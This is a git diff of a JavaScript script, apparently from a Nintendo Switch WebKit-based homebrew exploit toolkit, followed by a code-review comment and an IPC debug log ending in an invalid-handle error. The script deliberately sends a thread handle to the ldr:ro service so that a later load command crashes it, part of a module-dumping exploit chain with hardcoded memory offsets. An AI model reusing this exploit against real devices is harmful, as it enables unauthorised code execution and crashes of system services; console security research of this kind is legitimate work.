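diff --git a/usefulscripts/dumpModules.js b/usefulscripts/dumpModules.js
index a382369..d0edbdf 100644
--- a/usefulscripts/dumpModules.js
+++ b/usefulscripts/dumpModules.js
@@ -67,7 +67,7 @@ function dumpModule(module, loader, name) {
 utils.log("stage1, getting webkit ldr:ro handle");
 //We are reusing WebKit's ldr:ro session
-var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x955558);
+var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x95D1E8);
 //utils.log('ldr:ro management str base ptr is: ' + utils.paddr(ldrro_mng_ptr));
 var ldrro_mng = sc.read8(ldrro_mng_ptr);
 //utils.log('ldr:ro management str base is: ' + utils.paddr(ldrro_mng));
@@ -85,15 +85,16 @@ var nroSize = 0x1000;
 var bssSize = 0x900;
 //We initialize with a Thread Handle, 0xffff8000 instead of current process handle, 0xffff8001
-sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).sendTo(ldrro);
+sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).showPacked().sendTo(ldrro).assertOk();
 //We setup a fake nrr loading sequence
-sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().sendTo(ldrro);
+utils.log(" Trying loadnrr");
+sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().showPacked().sendTo(ldrro).assertOk();
 utils.log("stage3, crashing ldr:ro");
 //Just calling a normal cmd0 will crash since it will call svcMapProcessCodeMemory during LoadNro sequence using a
 //thread handle, attempting a process handle. This happens because svcGetProcessInfo in ldr:ro initialize can also take up
 //a Thread Handle as an argument, while svcMapProcessCodeMemory will bug out on it
-var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().sendTo(ldrro);
+var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().showPacked().sendTo(ldrro).assertOk();
 //Those are useless so better free them now
 sc.free(nrobase);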
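Review bot: The new offset `0x95D1E8` on the `ldrro_mng_ptr` line in the first hunk is a bare magic number that depends on one specific build of the main binary, and nothing in the hunk records which build it was taken from, so the next time it goes stale (as the old `0x955558` just did) nobody can tell from the code whether the constant or the environment is wrong. A comment on that line such as `// ldr:ro manager pointer offset, valid only for <build/version — fill in>; re-derive when the binary changes` would make the dependency explicit and cheap to audit. The `.assertOk()` calls added in the second hunk are an improvement in that a wrong handle now fails loudly instead of silently continuing, but since the third call is documented on the `stage3` comment as expected to crash the service, it is worth stating in a comment whether an error result there is a success or a failure of the sequence. dumpModule's body starts before the first hunk and the second hunk is cut off before the function ends.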
stage1, getting webkit ldr:ro handle | |
stage2, connecting to ldr:ro | |
ipcm+0x0 | 04 00 00 00 0a 00 00 80 03 00 00 00 00 00 00 00 | ................ | | |
ipcm+0x10 | 00 00 00 00 00 80 ff ff 00 00 00 00 00 00 00 00 | ................ | | |
ipcm+0x20 | 53 46 43 49 00 00 00 00 04 00 00 00 00 00 00 00 | SFCI............ | | |
ipcm+0x30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ | | |
Trying loadnrr | |
ipcm+0x0 | 04 00 00 00 0e 00 00 80 01 00 00 00 00 00 00 00 | ................ | | |
ipcm+0x10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ | | |
ipcm+0x20 | 53 46 43 49 00 00 00 00 02 00 00 00 00 00 00 00 | SFCI............ | | |
ipcm+0x30 | 00 00 00 00 00 00 00 00 00 40 53 23 0b 00 00 00 | .........@S#.... | | |
ipcm+0x40 | 00 10 00 00 00 00 00 00 00 00 00 00 | ............ | | |
IPC message: | |
- Command ID / Result code: Error: 0xe401 (Invalid handle. in module Kernel) | |
ERR [826]: 0xe401 (Invalid handle. in module Kernel) | |
ResultCode@exploit/ResultCode.js:15:0 | |
assertOk@exploit/ipc.js:555:0 | |
eval code |